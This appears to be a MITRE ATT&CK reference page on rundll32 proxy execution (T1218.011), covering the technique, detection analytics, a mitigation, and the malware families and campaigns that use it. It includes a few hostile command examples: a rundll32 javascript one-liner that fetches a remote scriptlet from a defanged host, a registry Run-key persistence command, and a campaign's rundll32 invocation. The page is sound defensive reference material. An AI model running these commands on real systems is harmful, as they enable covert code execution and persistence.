# T1218.011 - System Binary Proxy Execution: Rundll32

**Tactic:** Defense Evasion
**Platforms:** Windows
**Reference:** https://attack.mitre.org/techniques/T1218/011

## Description

Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: <code>rundll32.exe {DLLname, DLLfunction}</code>).

Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions <code>Control_RunDLL</code> and <code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe to execute. For example, ClickOnce can be proxied through Rundll32.exe.

Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: <code>rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")"</code>  This behavior has been seen used by malware such as Poweliks.

Threat actors may also abuse legitimate, signed system DLLs (e.g., <code>zipfldr.dll, ieframe.dll</code>) with <code>rundll32.exe</code> to execute malicious programs or scripts indirectly, making their activity appear more legitimate and evading detection.

Adversaries may also attempt to obscure malicious code from analysis by abusing the manner in which rundll32.exe loads DLL function names. As part of Windows compatibility support for various character sets, rundll32.exe will first check for wide/Unicode then ANSI character-supported functions before loading the specified function (e.g., given the command <code>rundll32.exe ExampleDLL.dll, ExampleFunction</code>, rundll32.exe would first attempt to execute <code>ExampleFunctionW</code>, or failing that <code>ExampleFunctionA</code>, before loading <code>ExampleFunction</code>). Adversaries may therefore obscure malicious code by creating multiple identical exported function names and appending <code>W</code> and/or <code>A</code> to harmless ones. DLL functions can also be exported and executed by an ordinal number (ex: <code>rundll32.exe file.dll,#1</code>).

Additionally, adversaries may use Masquerading techniques (such as changing DLL file names, file extensions, or function names) to further conceal execution of a malicious payload.

## Detection

### Detection Analytics

**Analytic 1308**

Detects rundll32.exe invoked with atypical arguments (.dll, .cpl, javascript:, mshtml). DLLs not normally loaded by rundll32 are mapped into memory. Control_RunDLL or RunHTMLApplication invoked. Suspicious DLLs or scripts accessed from disk or network. Rundll32 reaches out to external domains (e.g., fetching .sct or .hta).


## Mitigations

### M1050 - Exploit Protection

Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass application control.

## Targeted Assets

_No specific assets identified._

## Malware / Tools That Use This Technique

### S0045 - ADVSTORESHELL

ADVSTORESHELL has used rundll32.exe in a Registry value to establish persistence.

### S0438 - Attor

Attor's installer plugin can schedule rundll32.exe to load the dispatcher.

### S0520 - BLINDINGCAN

BLINDINGCAN has used Rundll32 to load a malicious DLL.

### S0093 - Backdoor.Oldrea

Backdoor.Oldrea can use rundll32 for execution on compromised hosts.

### S0606 - Bad Rabbit

Bad Rabbit has used rundll32 to launch a malicious DLL as <code>C:Windowsinfpub.dat</code>.

### S0268 - Bisonal

Bisonal has used rundll32.exe to execute as part of the Registry Run key it adds: <code>HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\”vert” = “rundll32.exe c:\windows\temp\pvcu.dll , Qszdez”</code>.

### S0635 - BoomBox

BoomBox can use RunDLL32 for execution.

### S0204 - Briba

Briba uses rundll32 within Registry Run Keys / Startup Folder entries to execute malicious DLLs.

### S1039 - Bumblebee

Bumblebee has used `rundll32` for execution of the loader component.

### S0137 - CORESHELL

CORESHELL is installed via execution of rundll32 with an export named "init" or "InitW."

### S0154 - Cobalt Strike

Cobalt Strike can use `rundll32.exe` to load DLL from the command line.

### S0244 - Comnie

Comnie uses Rundll32 to load a malicious DLL.

### S0046 - CozyCar

The CozyCar dropper copies the system file rundll32.exe to the install location for the malware, then uses the copy of rundll32.exe to load and execute the main CozyCar component.

### S0255 - DDKONG

DDKONG uses Rundll32 to ensure only a single instance of itself is running at once.

### S1052 - DEADEYE

DEADEYE can use `rundll32.exe` for execution of living off the land binaries (lolbin) such as `SHELL32.DLL`.

### S0568 - EVILNUM

EVILNUM can execute commands and scripts through rundll32.

### S0554 - Egregor

Egregor has used rundll32 during execution.

### S0081 - Elise

After copying itself to a DLL file, a variant of Elise calls the DLL file using rundll32.exe.

### S0082 - Emissary

Variants of Emissary have used rundll32.exe in Registry values added to establish persistence.

### S0634 - EnvyScout

EnvyScout has the ability to proxy execution of malicious files with Rundll32.

### S0267 - FELIXROOT

FELIXROOT uses Rundll32 for executing the dropper program.

### S0512 - FatDuke

FatDuke can execute via rundll32.

### S0143 - Flame

Rundll32.exe is used as a way of executing Flame at the command-line.

### S0381 - FlawedAmmyy

FlawedAmmyy has used `rundll32` for execution.

### S1044 - FunnyDream

FunnyDream can use `rundll32` for execution of its components.

### S0342 - GreyEnergy

GreyEnergy uses PsExec locally in order to execute rundll32.exe at the highest privileges (NTAUTHORITY\SYSTEM).

### S0698 - HermeticWizard

HermeticWizard has the ability to create a new process using `rundll32`.

### S1027 - Heyoka Backdoor

Heyoka Backdoor can use rundll32.exe to gain execution.

### S0483 - IcedID

IcedID has used rundll32.exe to execute the IcedID loader.

### S0260 - InvisiMole

InvisiMole has used rundll32.exe for execution.

### S0044 - JHUHUGIT

JHUHUGIT is executed using rundll32.exe.

### S0356 - KONNI

KONNI has used Rundll32 to execute its loader for privilege escalation purposes.

### S1190 - Kapeka

Kapeka is a Windows DLL file executed via ordinal by `rundll32.exe`.

### S0250 - Koadic

Koadic can use Rundll32 to execute additional payloads.

### S0236 - Kwampirs

Kwampirs uses rundll32.exe in a Registry value added to establish persistence.

### S1160 - Latrodectus

Latrodectus can use rundll32.exe to execute downloaded DLLs.

### S0167 - Matryoshka

Matryoshka uses rundll32.exe in a Registry Run key value for execution as part of its persistence mechanism.

### S0576 - MegaCortex

MegaCortex has used <code>rundll32.exe</code> to load a DLL for file encryption.

### S1122 - Mispadu

Mispadu uses RunDLL32 for execution via its injector DLL.

### S1026 - Mongall

Mongall can use `rundll32.exe` for execution.

### S0256 - Mosquito

Mosquito's launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.

### S0353 - NOKKI

NOKKI has used rundll32 for execution.

### S0637 - NativeZone

NativeZone has used rundll32 to execute a malicious DLL.

### S1100 - Ninja

Ninja loader components can be executed through rundll32.exe.

### S0368 - NotPetya

NotPetya uses <code>rundll32.exe</code> to install itself on remote systems when accessed via PsExec or <code>wmic</code>.

### S0196 - PUNCHBUGGY

PUNCHBUGGY can load a DLL using Rundll32.

### S1050 - PcShare

PcShare has used `rundll32.exe` for execution.

### S0518 - PolyglotDuke

PolyglotDuke can be executed using rundll32.exe.

### S0139 - PowerDuke

PowerDuke uses rundll32.exe to load.

### S0113 - Prikormka

Prikormka uses rundll32.exe to load its DLL.

### S0147 - Pteranodon

Pteranodon executes functions using rundll32.exe.

### S0650 - QakBot

QakBot has used Rundll32.exe to drop malicious DLLs including Brute Ratel C4 and to enable C2 communication.

### S0148 - RTM

RTM runs its core DLL file using rundll32.exe.

### S0481 - Ragnar Locker

Ragnar Locker has used rundll32.exe to execute components of VirtualBox.

### S1130 - Raspberry Robin

Raspberry Robin uses rundll32 execution without any command line parameters to contact command and control infrastructure, such as IP addresses associated with Tor nodes.

### S0461 - SDBbot

SDBbot has used rundll32.exe to execute DLLs.

### S0559 - SUNBURST

SUNBURST used Rundll32 to execute payloads.

### S1064 - SVCReady

SVCReady has used `rundll32.exe` for execution.

### S0074 - Sakula

Sakula calls cmd.exe to run various DLL files via rundll32.

### S0382 - ServHelper

ServHelper contains a module for downloading and executing DLLs that leverages <code>rundll32.exe</code>.

### S0589 - Sibot

Sibot has executed downloaded DLLs with <code>rundll32.exe</code>.

### S1030 - Squirrelwaffle

Squirrelwaffle has been executed using `rundll32.exe`.

### S0142 - StreamEx

StreamEx uses rundll32 to call an exported function.

### S1183 - StrelaStealer

StrelaStealer DLL payloads have been executed via `rundll32.exe`.

### S1196 - Troll Stealer

Troll Stealer is dropped as a DLL file and executed via `rundll32.exe` by its installer.

### S0452 - USBferry

USBferry can execute rundll32.exe in memory to avoid detection.

### S0141 - Winnti for Windows

The Winnti for Windows installer loads a DLL using rundll32.

### S0412 - ZxShell

ZxShell has used rundll32.exe to execute other DLLs and named pipes.

### S0032 - gh0st RAT

A gh0st RAT variant has used rundll32 for execution.

## Threat Groups

_No threat groups documented._

## Campaigns

### C0028 - 2015 Ukraine Electric Power Attack

During the 2015 Ukraine Electric Power Attack, Sandworm Team used a backdoor which could execute a supplied DLL using `rundll32.exe`.

### C0015 - C0015

During C0015, the threat actors loaded DLLs via `rundll32` using the `svchost` process.

### C0018 - C0018

During C0018, the threat actors used `rundll32` to run Mimikatz.

### C0021 - C0021

During C0021, the threat actors used `rundll32.exe` to execute the Cobalt Strike Beacon loader DLL.

### C0022 - Operation Dream Job

During Operation Dream Job, Lazarus Group executed malware with `C:\\windows\system32\rundll32.exe "C:\ProgramData\ThumbNail\thumbnail.db"`, `CtrlPanel S-6-81-3811-75432205-060098-6872 0 0 905`.

### C0005 - Operation Spalax

During Operation Spalax, the threat actors used `rundll32.exe` to execute malicious installers.

### C0024 - SolarWinds Compromise

During the SolarWinds Compromise, APT29 used `Rundll32.exe` to execute payloads.

### C0037 - Water Curupira Pikabot Distribution

Water Curupira Pikabot Distribution utilizes rundll32.exe to execute the final Pikabot payload, using the named exports `Crash` or `Limit` depending on the variant.
